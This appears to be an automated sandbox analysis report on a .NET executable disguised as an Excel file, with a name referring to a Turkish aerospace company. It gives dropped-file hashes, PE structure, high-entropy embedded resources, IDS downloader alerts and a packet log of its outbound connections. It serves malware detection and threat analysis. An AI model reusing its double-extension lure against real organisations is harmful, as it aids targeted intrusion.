                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.8.2.0.4.7.7.2.1.7.4.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.8.2.0.4.8.3.6.2.3.7.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.8.b.a.4.7.d.-.8.1.9.2.-.4.6.d.d.-.9.5.c.3.-.e.9.b.5.d.7.7.6.b.9.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.e.c.f.7.6.2.-.a.2.5.3.-.4.8.e.d.-.9.5.8.9.-.2.0.7.e.7.8.9.e.0.3.1.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.T.E.K.L.#.U.0.1.3.0.F. .#.U.0.1.3.0.S.T.E.#.U.0.1.1.e.#.U.0.1.3.0. .-. .T.U.S.A.#.U.0.1.5.e. .T.#.U.0.0.d.c.R.K. .H.A.V.A.C.I.L.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.K.a.t.s.i.n.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.4.-.2.b.8.a.-.7.a.b.0.7.e.4.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.c.b.f.4.1.1.f.6.6.d.4.5.5.e.6.0.e.4.3.6.2.c.d.b.d.5.d.b.0.a.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 16 streams, Fri Dec 13 16:47:28 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):373634
                                                                                        Entropy (8bit):3.3170227803978936
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:W5P4bsY4uKcS1lWoeoo23lZPct1CCqrGr03+vWy9:Aw16hPZUlqf3Qj
                                                                                        MD5:ACCBB5F0FB90DA84A555438A514BC588
                                                                                        SHA1:D6C5CEDB60FE6BE3ED4DC87AA968F92D72B68F78
                                                                                        SHA-256:595D0DE7BAD9B7EFD632881F225E44030F7CCA01B5DE282CD9F7A7FFAB13FDBC
                                                                                        SHA-512:71646DF5226FA4DE22CC0FAD8CDB4CF71C5DA65626D25924473A5C9E26535DC9A0C23BA273E6603ABA19B1DDA3925485980A92449BB5D77C592FA0CE46A10C83
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:MDMP..a..... ....... e\g....................................$...h.......(............C...n..........l.......8...........T............(...............5...........7..............................................................................eJ......88......Lw......................T.......T....e\g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8864
                                                                                        Entropy (8bit):3.7333666188975396
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJxSAAeg6YSTmhfVWGgmfnIM1pr/89bxakfzbm:R6lXJiZ6YGmhdgmfIMIxhfe
                                                                                        MD5:6034689AC0B56C93A3E73A901B394D02
                                                                                        SHA1:E61C8BD09B09DB131C318532E39A9F4B0D2E572E
                                                                                        SHA-256:FFB2EF4D89BAF2CFDADC987A12A6111235ADE08F350722416F75D7F246298416
                                                                                        SHA-512:3392FEC2127C2DE205E22C1FBD5E581D09FE8A3F7F9124EB09DC791B2340B6776ED02BE78D638F68BB00F38F6329B222DFDB0BE1577D31A7B72AFED7E02F7AA8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):5077
                                                                                        Entropy (8bit):4.67587328950869
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zs3Jg771I9oLWpW8VYvYm8M4JmQFXYjyq85v8ErDSzQvpaDSHd:uIjfZI7T67VXJyjxErez/eHd
                                                                                        MD5:043E923084BC68FF11F1A9B5FBCDF748
                                                                                        SHA1:91AED1CD042767C40EBBC929E10B4C643C6F20BA
                                                                                        SHA-256:C9B29B0F5E355D685968AEE48A2667559BB4A7FC1E51FCDBBB54CDC3EE25CD95
                                                                                        SHA-512:18C84E35C525438B953F3BB5488DFB16513EC15E3BE75CD74B7AA0E655135955CEBA0C1E0F58806ACD9D7153C7C05731C2EDDFE48F8D1A5C078A6822387E8D49
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629750" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.372977195389786
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:pFVfpi6ceLP/9skLmb04yWWSPtaJG8nAge35OlMMhA2AX4WABlguNjiL5e:/V1myWWI/glMM6kF7Jq5e
                                                                                        MD5:8BF94499A92D28AD9A0FAEE01E1134C9
                                                                                        SHA1:A89781E0C046FAAF5946FE3D057630D4580DE9F7
                                                                                        SHA-256:8FC0E91D6C48B0849486CB46FBBA7974F6EFEB120BA6FE23D6A70BFFDA0CFF65
                                                                                        SHA-512:B747116B442DE6C3F3FEC584EC6D11238D58B62788CB8AA6456F3581F1D186549559D8A54F6FE57AB73417E6EB1B90F9C46D4E337F01A356E0667B9B806C15AF
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@{.~M..............................................................................................................................................................................................................................................................................................................................................bWl.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.9937371823848915
                                                                                        TrID:
                                                                                        • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                        • Win64 Executable Console (202006/5) 47.64%
                                                                                        • Win64 Executable (generic) (12005/4) 2.83%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                        • DOS Executable Generic (2002/1) 0.47%
                                                                                        File name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                        File size:638'976 bytes
                                                                                        MD5:037b9dc9d5bee07e111173cbe87624b4
                                                                                        SHA1:881d8ba41c222c0ff9ee96dab3e954417da6c34f
                                                                                        SHA256:3f9ac29a06c3a7145971c352ecc386b94dc13be8b479d09c920f36e20f6b1b41
                                                                                        SHA512:5fc5c3794ff87db5d13e2b93c5805f4b17c23aff7d4f348a7634206f88d3814f479d9a73a157e8f01823facf5e70dea831a8725d45171b5e1164397ce2a08433
                                                                                        SSDEEP:12288:OPbTRt0NTO1JKbMDrZrVW+RLV//TSrSv9GDa0YN7vuAwmqG8kL:ybTniTOHmWr5Uq+rSoEduAwmNx
                                                                                        TLSH:3AD42380D7486A69DC3D3BB9EA279CFA1C4CFE6258A369778D107D620D745C431A2CB3
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!.[g.........."...0..0............... ....@...... ..............................-.....`................................
                                                                                        Icon Hash:4f81888c8c89874f
                                                                                        Entrypoint:0x400000
                                                                                        Entrypoint Section:
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x675B9D21 [Fri Dec 13 02:34:09 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:
                                                                                        Instruction
                                                                                        dec ebp
                                                                                        pop edx
                                                                                        nop
                                                                                        add byte ptr [ebx], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax+eax], al
                                                                                        add byte ptr [eax], al
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x98b82.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x30a20x32007b158ee8bdf0227222a608ae1c80f1abFalse0.612734375data6.139186529436959IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x60000x98b820x98c004be3baa6debe71ed51148f0f564660adFalse0.9942077536824877data7.998256605720663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        OMNIPOTENTMALWARE0x63c00x97010data1.0003168895672194
                                                                                        OMNIPOTENTMALWARE0x9d3d00x180data1.0286458333333333
                                                                                        OMNIPOTENTMALWARE0x9d5500x20data1.28125
                                                                                        OMNIPOTENTMALWARE0x9d5700x10data1.5625
                                                                                        OMNIPOTENTMALWARE0x9d5800x10data1.5
                                                                                        OMNIPOTENTMALWARE0x9d5900x10data1.5
                                                                                        RT_ICON0x9d5a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.37406191369606
                                                                                        RT_GROUP_ICON0x9e6480x14data1.1
                                                                                        RT_VERSION0x9e65c0x33cdata0.42391304347826086
                                                                                        RT_MANIFEST0x9e9980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-13T17:47:30.501678+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849704132.226.8.16980TCP
                                                                                        2024-12-13T17:47:33.251737+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849704132.226.8.16980TCP
                                                                                        2024-12-13T17:47:34.911215+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849709104.21.67.152443TCP
                                                                                        2024-12-13T17:47:36.517401+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711132.226.8.16980TCP
                                                                                        2024-12-13T17:47:38.152950+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849713104.21.67.152443TCP
                                                                                        2024-12-13T17:47:41.414563+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849717104.21.67.152443TCP
                                                                                        2024-12-13T17:47:44.687718+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849719104.21.67.152443TCP
                                                                                        2024-12-13T17:47:57.776310+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849727104.21.67.152443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 13, 2024 17:47:28.206691027 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:28.326636076 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:28.326731920 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:28.336915016 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:28.456644058 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:29.932717085 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:29.941494942 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:30.063574076 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:30.448084116 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:30.501677990 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:30.999337912 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:30.999403000 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:31.001262903 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:31.016493082 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:31.016527891 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:32.252230883 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:32.252370119 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:32.256717920 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:32.256735086 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:32.257026911 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:32.298578978 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:32.307024002 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:32.347337961 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:32.705193996 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:32.705346107 CET44349706104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:32.705482960 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:32.711642981 CET49706443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:32.715142965 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:32.838670015 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:33.210464954 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:33.212512016 CET49709443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:33.212579966 CET44349709104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:33.212683916 CET49709443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:33.212985992 CET49709443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:33.213005066 CET44349709104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:33.251737118 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:34.460902929 CET44349709104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:34.469963074 CET49709443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:34.470005035 CET44349709104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:34.911250114 CET44349709104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:34.911339045 CET44349709104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:34.911406040 CET49709443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:34.911906004 CET49709443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:34.915183067 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:34.916273117 CET4971180192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:35.035614014 CET8049704132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:35.036294937 CET4970480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:35.036309958 CET8049711132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:35.036549091 CET4971180192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:35.036549091 CET4971180192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:35.157344103 CET8049711132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:36.468311071 CET8049711132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:36.469763994 CET49713443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:36.469799995 CET44349713104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:36.469871044 CET49713443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:36.470411062 CET49713443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:36.470427990 CET44349713104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:36.517400980 CET4971180192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:37.688591003 CET44349713104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:37.699980021 CET49713443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:37.699999094 CET44349713104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:38.152842045 CET44349713104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:38.152906895 CET44349713104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:38.152992964 CET49713443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:38.153451920 CET49713443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:38.158612013 CET4971580192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:38.283354998 CET8049715132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:38.283648968 CET4971580192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:38.283648968 CET4971580192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:38.403588057 CET8049715132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:39.726651907 CET8049715132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:39.728033066 CET49717443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:39.728065014 CET44349717104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:39.728136063 CET49717443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:39.728534937 CET49717443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:39.728545904 CET44349717104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:39.767328024 CET4971580192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:40.941395998 CET44349717104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:40.951236963 CET49717443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:40.951265097 CET44349717104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:41.414398909 CET44349717104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:41.414468050 CET44349717104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:41.414622068 CET49717443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:41.415280104 CET49717443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:41.462723970 CET4971580192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:41.463733912 CET4971880192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:41.583022118 CET8049715132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:41.583117008 CET4971580192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:41.583529949 CET8049718132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:41.583589077 CET4971880192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:41.583791018 CET4971880192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:41.703773022 CET8049718132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:43.017601013 CET8049718132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:43.018892050 CET49719443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:43.018946886 CET44349719104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:43.019028902 CET49719443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:43.019336939 CET49719443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:43.019347906 CET44349719104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:43.064189911 CET4971880192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:44.233232975 CET44349719104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:44.235752106 CET49719443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:44.235775948 CET44349719104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:44.687702894 CET44349719104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:44.687988997 CET44349719104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:44.688040018 CET49719443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:44.691205025 CET49719443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:44.812650919 CET4971880192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:44.817539930 CET4972080192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:44.936925888 CET8049718132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:44.937005043 CET4971880192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:44.941685915 CET8049720132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:44.941806078 CET4972080192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:44.943222046 CET4972080192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:45.064048052 CET8049720132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:46.364022970 CET8049720132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:46.365447998 CET49721443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:46.365502119 CET44349721104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:46.365595102 CET49721443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:46.365856886 CET49721443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:46.365892887 CET44349721104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:46.408124924 CET4972080192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:47.585923910 CET44349721104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:47.626740932 CET49721443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:47.660648108 CET49721443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:47.660711050 CET44349721104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:48.037079096 CET44349721104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:48.037147045 CET44349721104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:48.037213087 CET49721443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:48.037623882 CET49721443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:48.041302919 CET4972080192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:48.042845964 CET4972280192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:48.162763119 CET8049720132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:48.162857056 CET4972080192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:48.163891077 CET8049722132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:48.163984060 CET4972280192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:48.164143085 CET4972280192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:48.284506083 CET8049722132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:49.614218950 CET8049722132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:49.615935087 CET49723443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:49.616000891 CET44349723104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:49.616096973 CET49723443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:49.616410017 CET49723443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:49.616430044 CET44349723104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:49.658041000 CET4972280192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:50.834312916 CET44349723104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:50.836183071 CET49723443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:50.836288929 CET44349723104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:51.283843994 CET44349723104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:51.283915043 CET44349723104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:51.283970118 CET49723443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:51.284375906 CET49723443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:51.292916059 CET4972280192.168.2.8132.226.8.169
